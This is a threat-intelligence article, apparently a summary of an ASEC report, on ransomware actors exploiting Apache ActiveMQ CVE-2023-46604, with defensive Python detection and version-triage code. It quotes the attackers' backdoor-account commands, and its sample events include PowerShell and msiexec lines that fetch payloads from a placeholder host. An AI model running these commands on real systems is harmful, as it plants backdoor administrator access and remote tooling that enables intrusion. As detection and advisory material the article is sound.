Mauri Ransomware Group Targeting Apache ActiveMQ Vulnerability (CVE-2023-46604)

AhnLab Security Intelligence Response Center (ASEC) researchers have discovered that the CVE-2023-46604 vulnerability in Apache ActiveMQ servers is being exploited on systems in Korea. This vulnerability enables remote code execution through the manipulation of serialized class types in the OpenWire protocol.

Overview

The vulnerability began being actively exploited shortly after its disclosure, with incidents linked to the Andariel group and HelloKitty ransomware. Unpatched systems have been continuously targeted, with attackers deploying tools such as Ladon, Netcat, AnyDesk, and z0Miner to compromise environments. Recently, ASEC has observed signs that Mauri ransomware threat actors are exploiting CVE-2023-46604, using Quasar RAT as part of the attack chain to exfiltrate data and gain control over systems via remote desktop. Although no confirmed Mauri ransomware attacks have been reported, ASEC notes that Mauri ransomware has been uploaded to the attacker's download server.

Intelligence reports have identified threat activity exploiting CVE-2023-46604 to facilitate HelloKitty ransomware attacks. The threat actor exploited the vulnerability to deliver and launch malicious MSI binaries using msiexec.exe. The actor then tampered with system services and launched the ransomware. Incident response reports have also observed indicators of additional activity targeting ActiveMQ since late October 2023, though the exploitation method has not been confirmed.

Exploitation

The vulnerability is triggered when an attacker manipulates the serialized class type in the OpenWire protocol, which is used by Apache ActiveMQ to communicate with other systems. Here’s how the attack works:

  1. The attacker crafts a malicious packet with a modified class reference.
  2. The vulnerable Apache ActiveMQ server, upon receiving this packet, loads an XML configuration file from a URL that is embedded in the packet.
  3. The server then executes commands specified in the XML file, which allows the attacker to execute arbitrary code and potentially take full control of the affected system.

This attack requires the Apache ActiveMQ server to be exposed externally (accessible from the internet) and unpatched against the vulnerability.

Attack Chain and Malware Installation

Initial Access: Attackers typically target systems running unpatched Apache ActiveMQ servers. These systems are scanned for the CVE-2023-46604 vulnerability.

Malicious Actions:

  • Backdoor Account Creation: The first step for attackers is to create a backdoor account to maintain access. One example is the account “adminCaloX1”. The attacker uses commands like:

      net user adminCaloX1 CaloX@2580 /add
      net localgroup Administrators adminCaloX1 /add

    These commands create a new user with administrative privileges and enable RDP access.
  • Frpc and RDP: The attacker then installs Frpc, the client component of frp (Fast Reverse Proxy), an open-source tool used to bypass firewalls and expose systems that are behind NAT or firewalls. Frpc is installed using PowerShell commands, and it forwards the infected system’s RDP port (3389) to an external server controlled by the attacker.
  • RDP Access: Once the system is exposed using Frpc, the attacker can use the backdoor account to access the system remotely through RDP.
  • Malware Deployment: The attackers also deploy other malware, such as Quasar RAT, a remote access trojan that provides the attacker with control over the infected system. Quasar RAT allows:
    • Remote command execution.
    • File and registry manipulation.
    • Keylogging and the theft of account information.

Proxy Tools: The Frpc tool is a critical component of the attack, as it allows the attacker to establish an external connection to the infected system even if it is behind a firewall. This enables the attacker to access RDP or other services that would otherwise be inaccessible.

Ransomware: Although not directly confirmed, there is evidence that Mauri ransomware was also uploaded to the affected systems. Mauri ransomware is an open-source tool often used by cybercriminals to encrypt data and demand a ransom for its release. The presence of this ransomware on the download server suggests that it might be used in attacks, particularly given that it has been used widely in previous attacks under other names, such as Mimus by the Mimo threat actor.
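The post-exploitation steps above (backdoor account creation, addition to Administrators, Frpc execution, and the msiexec.exe delivery mentioned earlier) leave distinctive command lines in process-creation telemetry. The following detection logic is an added example, not code from ASEC or the article; the events, weights and threshold are constructed for illustration, and the host names, parent processes and the 192.0.2.10 address are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events: (host, parent process, command line).
# Modelled on the post-exploitation chain described in the article; not real telemetry.
SAMPLE_EVENTS = [
    ("srv-mq01", "java.exe", "cmd.exe /c net user adminCaloX1 CaloX@2580 /add"),
    ("srv-mq01", "java.exe", "cmd.exe /c net localgroup Administrators adminCaloX1 /add"),
    ("srv-mq01", "java.exe", "powershell.exe -c Invoke-WebRequest http://192.0.2.10:83/frpc.exe -OutFile C:\\Windows\\Temp\\frpc.exe"),
    ("srv-mq01", "powershell.exe", "C:\\Windows\\Temp\\frpc.exe -c C:\\Windows\\Temp\\c.ini"),
    ("srv-mq02", "java.exe", "msiexec.exe /q /i http://192.0.2.10:83/update.msi"),
    ("srv-web01", "explorer.exe", "net user jdoe /domain"),   # benign lookup, must not match
]

# (rule name, regex over the command line, constructed weight)
RULES = [
    ("local_account_added", re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I), 2),
    ("added_to_administrators", re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I), 3),
    ("frpc_executed", re.compile(r"\bfrpc(?:\.exe)?\b.*\s-c\s", re.I), 3),
    ("remote_msi_install", re.compile(r"\bmsiexec(?:\.exe)?\b.*https?://", re.I), 3),
]
# ActiveMQ runs inside the JVM; a shell spawned directly by the broker process is the
# strongest context signal for CVE-2023-46604 post-exploitation (assumed parent names).
BROKER_PARENTS = {"java.exe", "wrapper.exe"}

def classify_event(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx, _ in RULES if rx.search(cmdline)]

def score_hosts(events):
    """Accumulate rule weights per host; +2 when the parent is the broker process.
    Returns {host: {"score": int, "findings": [rule names]}} for hosts with any match."""
    out = defaultdict(lambda: {"score": 0, "findings": []})
    for host, parent, cmdline in events:
        for name, rx, weight in RULES:
            if rx.search(cmdline):
                bonus = 2 if parent.lower() in BROKER_PARENTS else 0
                out[host]["score"] += weight + bonus
                out[host]["findings"].append(name)
    return dict(out)

def suspected_compromise(events, threshold=5):
    """Sorted hosts whose accumulated score reaches the (constructed) threshold."""
    return sorted(h for h, r in score_hosts(events).items() if r["score"] >= threshold)
```

On the sample data both broker hosts are flagged while the workstation's routine `net user` query is not; in production the threshold and parent-process list should be tuned to the environment.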

Recommendations

iProtect recommends the following mitigations to reduce the impact of this threat:

  1. Upgrade Affected Servers: Due to active attacks and the availability of exploitation details, organizations should immediately upgrade affected servers. Apache recommends upgrading ActiveMQ to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to address the issue.
  2. Review Logs and Alerts: Review logs and alerts for signs of exploitation or post-compromise activity on affected servers, such as malicious files dropped and executed via the msiexec.exe command. Note that upgrading ActiveMQ will not remove any attacker artifacts.
  3. Reset Credentials: If exploitation is detected, reset the credentials for accounts that have been used or logged onto the server. Also, rotate credentials for any service accounts related to ActiveMQ.
  4. Harden Servers: Follow Apache’s ActiveMQ security recommendations to harden servers. Enabling authentication for brokers can prevent an attacker from moving laterally to another broker without proper authentication.

Apache ActiveMQ servers running the following versions are vulnerable to CVE-2023-46604:

  • Apache ActiveMQ versions 5.15.15 or earlier
  • Versions 5.16.0 – 5.16.6
  • Versions 5.17.0 – 5.17.5
  • Versions 5.18.0 – 5.18.2
  • Legacy OpenWire Module versions 5.15.15 and earlier
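The affected ranges above and the fixed releases from the Recommendations section map directly onto a version triage check for an inventory of brokers. The following is an added example, not code from Apache or the article; it models only the ActiveMQ release branches listed here (the separately listed Legacy OpenWire Module is not modelled), and treats versions newer than 5.18 as outside the listed ranges rather than asserting anything about them.

```python
# First fixed patch level per branch, as given in the article's recommendations.
# The article also lists "5.15.15 or earlier", so every branch below 5.15 is vulnerable.
FIXED = {
    (5, 15): 16,   # 5.15.16
    (5, 16): 7,    # 5.16.7
    (5, 17): 6,    # 5.17.6
    (5, 18): 3,    # 5.18.3
}

def parse_version(s):
    """'5.16.6' -> (5, 16, 6). A suffix such as '-SNAPSHOT' is ignored."""
    parts = s.strip().split("-")[0].split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised ActiveMQ version: {s!r}")
    major, minor, patch = (int(p) for p in parts)
    return major, minor, patch

def assess(version):
    """Classify a version against the ranges the article lists.
    Returns 'vulnerable', 'fixed', or 'outside listed ranges' (e.g. 6.x)."""
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch in FIXED:
        return "vulnerable" if patch < FIXED[branch] else "fixed"
    if branch < (5, 15):
        return "vulnerable"            # covered by "5.15.15 or earlier"
    return "outside listed ranges"     # newer branch not covered by the article's table

def recommended_upgrade(version):
    """Smallest fixed release on the same branch; pre-5.15 installs go to 5.15.16."""
    major, minor, _ = parse_version(version)
    branch = (major, minor) if (major, minor) in FIXED else (5, 15)
    return "%d.%d.%d" % (branch[0], branch[1], FIXED[branch])

def triage(versions):
    """Map each reported version to an action string for an inventory report."""
    result = {}
    for v in versions:
        status = assess(v)
        result[v] = f"vulnerable: upgrade to {recommended_upgrade(v)}" if status == "vulnerable" else status
    return result
```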

Indicators of Compromise

IP

18[.]139[.]156[.]111

References

Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604).